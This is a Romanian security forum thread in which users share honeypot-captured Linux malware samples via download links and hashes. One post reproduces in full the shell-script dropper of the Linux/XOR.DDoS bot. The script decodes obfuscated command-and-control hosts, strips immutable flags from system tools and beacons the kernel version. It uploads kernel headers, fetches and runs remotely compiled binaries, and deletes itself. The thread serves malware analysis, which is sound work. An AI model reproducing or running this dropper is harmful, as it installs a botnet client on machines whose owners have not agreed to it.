malsploit Posted October 24, 2014 Report Posted October 24, 2014 (edited) Am setat un honeypot si am reusit sa prind cateva chestii. Daca aveti chef si timp, uitati-va si si voi peste ele.https://mega.co.nz/#F!7pkTXIwA!CEUuPjIZ5tZMEPo6mzbuaw2789524badd154ba54197b90644bd3fc 3502.rara984d8d0a5b39e96beb42ee137736e5c 3502_s.raredf1a95c76faa1e304d31ddc633660f8 3503.rar9dae3c2cd7fd4e8f8215a34302009bd9 java555.raraa58641c1f6827c0bc751b948ea85eef java666.rar3502.rar: POSIX shell script, ASCII text executable3502_s.rar: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped3503.rar: POSIX shell script, ASCII text executablejava555.rar: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not strippedjava666.rar: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped Edited October 24, 2014 by hate.me Quote
blech Posted November 5, 2014 Report Posted November 5, 2014 @hate.meam scanat de curiozitate 2 dintre fisiere online:3502_s.shhttps://www.virustotal.com/en/file/50bf4092721fd8e2127e8602ee83edad37d2ec6650aa4f808792b36a941a79b7/analysis/1415195145/daca il deschid cu un notepad++ vad foarte multe caractere aiurea pe care nu le pot interpreta dar se mai vad si stringuri in cleartext: %s: cannot create file: %s %s: cannot map file: %s %s: cannot stat file: %s %s: file is no correct profile data file for `%s' Out of memory while initializing profiler invalid mode for dlopen() cannot extend global scope cannot create scope list no more namespaces available for dlmopen() invalid target namespace in dlmopen() empty dynamic string token substitution opening file=%s [%lu]; direct_opencount=%u TLS generation counter wrapped! Please report this. closing file=%s; direct_opencount=%ufile=%s [%lu]; destroying link map TLS generation counter wrapped! Please report as described in <http://www.gnu.org/software/libc/bugs.html>.calling fini: %s [%lu]sau empty dynamics string token substitution load auxiliary object=%s requested by file=%s load filtered object=%s requested by file=%s cannot allocate dependency list cannot allocate symbol search list Filters not supported with LD_TRACE_PRELINKING calling init: %scalling preinit: %s checking for version `%s' in file %s [%lu] required by file %s [%lu] no version information available (required by cannot allocate version reference table unsupported version of Verdef record weak version ` ' not found (required by of Verneed record RTLD_NEXT used in code not dynamically loaded –æýÿãæýÿÂæýÿ–$þÿü#þÿì#þÿÜ#þÿÿ"þÿÿ"þÿÿ"þÿÿ"þÿ€#þÿr#þÿ9#þÿe#þÿ*** stack smashing detected ***: %s terminatediar al doilea fisier 3503.sh (rar)#!/bin/sh__host_32__="sEEA+==deadefadcajc"__host_64__="sEEA+==deadefadcaih"__host_32_2__="sEEA+==cbeadgakaddh"__host_64_2__="sEEA+==cbeadgakaddg"__host_32_libc__="sEEA+==cbeadgakaddh"__host_64_libc__="sEEA+==cbeadgakaddg"__download_url__="sEEA+==deadefadcajd=FAwzlo=egbe"__remote__="cbeadgakadfg+egbe|cbeadfbacfcagb+egbe|hhacbdadgeaeb+egbe|yoyDaoDludlcazCr+egbe|yoyDaoDludlazCr+egbe|yoyDasnItlzlzanzx+egbe|yoyDaoDludlanzx+egbe"__username__='loxty'__password__='admin'__temp__=/tmp__install_dir__=/usr/local/bin__kernel__=`uname -r|awk -F- '{print $1}'`# select compiler serverserver(){ __osv_X86_64=`dec 'Ijh_hf'` __osv_AMD64=`dec 'LXOhf'` __os_version_X86_64=`uname -a|grep "$__osv_X86_64"` __os_version_AMD64=`uname -a|grep "$__osv_AMD64"` if [ -f /lib/libc.so.6 ]; then __libc_main=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $1}'` __libc_sub=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $2}'` fi if [ ! -z "$__os_version_X86_64" -o ! -z "$__os_version_AMD64" ] ;then __online=`wget "$__host_64__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -` if [ ! -z "$__online" ]; then # __host__=$__host_64__ else __host__=$__host_64_2__ fi if [ -f /lib/libc.so.6 ]; then if [ $__libc_main -le 2 ]; then if [ $__libc_sub -le 5 ]; then __host__=$__host_64_libc__ fi fi fi else __online=`wget "$__host_32__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -` if [ ! -z "$__online" ]; then # __host__=$__host_32__ else __host__=$__host_32_2__ fi if [ -f /lib/libc.so.6 ]; then if [ $__libc_main -le 2 ]; then if [ $__libc_sub -le 5 ]; then __host__=$__host_32_libc__ fi fi fi fi}# check md5md5(){ __data=`echo "$@"` echo -n "$__data"|md5sum|cut -d ' ' -f1 return 0}# get os versionversion(){ if [ -f /sbin/modinfo ]; then SYS=`/sbin/lsmod |tail -n 1 | awk ' {print $1} '` echo "`/sbin/modinfo $SYS|grep vermagic|awk -F: '{print $2}'|sed 's/^ *//g'|awk '{print $0}'|sed 's/ /\\\\ /g'`" fi return 0}checkBuild(){ __build=/lib/modules/`uname -r`/build/ if [ -d $__build ]; then return 1 fi return 0}# generate header filegenerate(){ __files=`ls $__build` tar zcfhP "$__temp__/dev.tgz" -C $__build $__files if [ $? -eq 0 ] ;then return 1 fi return 0}# check header versioncheck(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __result=`wget "$__host__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 3 -O - -q` if [ ! -z "$__result" ]; then __code=`echo $__result|awk -F "|" '{print $1}'` __md5=`echo $__result|awk -F "|" '{print $2}'` if [ $__code -eq 1001 ]; then return 1 fi fi fi return 0}# download build filedownload(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __url="$__host__/upload/module/$__iid/build.tgz" wget "$__url" -O /tmp/build.tgz -q --connect-timeout=3 -t 3 if [ $? -eq 0 ];then # return 1 fi fi return 0}download_and_execute(){ wget "$__download_url__" -O /tmp/bin -q --connect-timeout=3 -t 3 if [ $? -eq 0 ];then # chmod +x /tmp/bin /tmp/bin sleep 3 rm -rf /tmp/bin return 1 fi return 0}# remote compiler codecompiler(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __url="$__host__/compiler?iid=$__iid&username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__" __result=`wget "$__url" -O - -q --connect-timeout=3 -t 3` if [ ! -z "$__result" ]; then __code=`echo $__result|awk -F "|" '{print $1}'` __md5=`echo $__result|awk -F "|" '{print $2}'` if [ $__code -eq 1001 ]; then return 1 fi fi fi return 0}# uncompress fileuncompress(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then if [ ! -d $__temp__/$__iid ]; then mkdir $__temp__/$__iid fi tar zxvf $__temp__/build.tgz -C $__temp__/$__iid if [ $? -eq 0 ] ;then shred -u -z $__temp__/build.tgz return 1 fi fi return 0}enc(){ echo $@|tr "[.0-9a-zA-Z\/\/\:]" "[a-zA-Z0-9\;-=+*\/]"; }dec(){ echo $@|tr "[a-zA-Z0-9\;-=+*\/]" "[.0-9a-zA-Z\/\/\:]"; }# install filesetup(){ __iid=`echo "$@"` if [ ! -z "$__iid" ]; then __bin=`echo "bin"` chmod +x $__temp__/$__iid/$__bin $__temp__/$__iid/$__bin if [ $? -eq 0 ]; then sleep 3 rm -rf $__temp__/$__iid/$__bin return 1 fi fi return 0}# uploadupload(){ rm -f /tmp/mini wget $__host__/upload/mini -O /tmp/mini -q --connect-timeout=3 -t 3 if [ $? -eq 0 ];then # chmod +x /tmp/mini __url=$__host__/submit __result=`/tmp/mini --url="$__url" --post="username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__&file=@$__temp__/dev.tgz"` if [ ! -z "$__result" ]; then __code=`echo $__result|awk -F "|" '{print $1}'` __md5=`echo $__result|awk -F "|" '{print $2}'` if [ $__code -eq 1001 ]; then rm -f /tmp/mini return 1 fi fi rm -f /tmp/mini fi return 0}# main entrymain(){ PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin __host_32__=`dec "$__host_32__"` __host_64__=`dec "$__host_64__"` __host_32_2__=`dec "$__host_32_2__"` __host_64_2__=`dec "$__host_64_2__"` __host_32_libc__=`dec "$__host_32_libc__"` __host_64_libc__=`dec "$__host_64_libc__"` __download_url__=`dec "$__download_url__"` __remote__=`dec "$__remote__"` __username__=`dec "$__username__"` __version__=`version` __iid=`md5 "$__version__"` __iid=`echo $__iid|tr [:lower:] [:upper:]` __done=0 if [ ! -d /tmp ]; then mkdir /tmp fi if [ -f /usr/bin/wget ]; then chattr -i /usr/bin/wget chmod +x /usr/bin/wget fi if [ -f /bin/wget ]; then chattr -i /bin/wget chmod +x /bin/wget fi if [ -f /usr/bin/cut ]; then chattr -i /usr/bin/cut chmod +x /usr/bin/cut fi if [ -f /bin/cut ]; then chattr -i /bin/cut chmod +x /bin/cut fi server # select http server check $__iid if [ $? -eq 1 ];then compiler $__iid # remote compiler if [ $? -eq 1 ]; then __done=1 fi else checkBuild if [ $? -eq 1 ];then generate # create header file if [ $? -eq 1 ]; then upload if [ $? -eq 1 ] ;then __done=1 fi rm -rf $__temp__/dev.tgz else if [ -f $__temp__/dev.tgz ]; then rm -rf $__temp__/dev.tgz fi compiler $__iid # remote compiler if [ $? -eq 1 ]; then __done=1 fi fi else compiler $__iid # remote compiler if [ $? -eq 1 ]; then __done=1 fi fi fi if [ $__done -eq 1 ]; then download $__iid if [ $? -eq 1 ]; then uncompress $__iid if [ $? -eq 1 ]; then setup $__iid if [ $? -ne 1 ]; then __done=0 fi else __done=0 fi else __done=0 fi fi if [ $__done -eq 0 ]; then download_and_execute fi rm -rf $__temp__/$__iid rm -f $0}mainls -la /var/run/sftp.pidexit $?care se pricepe sa interpreteze codul... go for it! Quote
malsploit Posted November 5, 2014 Author Report Posted November 5, 2014 Malware Must Die!: MMD-0028-2014 - Fuzzy reversing a new China ELF "Linux/XOR.DDoS" Quote
malsploit Posted March 21, 2015 Author Report Posted March 21, 2015 https://mega.co.nz/#!Sl10XY5I!kx8AqbKjY8DB5Vyr0NE0qZDpPWVgp3a40D3xs2Zjp-ohttps://mega.co.nz/#!b9VAnCRQ!rwjkhbw76a5hnDwTepkanV0zlidmeNFOF0LoAnfAaQUtxmas: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, strippedtxmss: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not strippedec8ff2f6226f7085059466164f71976c txmasd26b6ffee5d75b3c63c2e080f4bc735f txmss Quote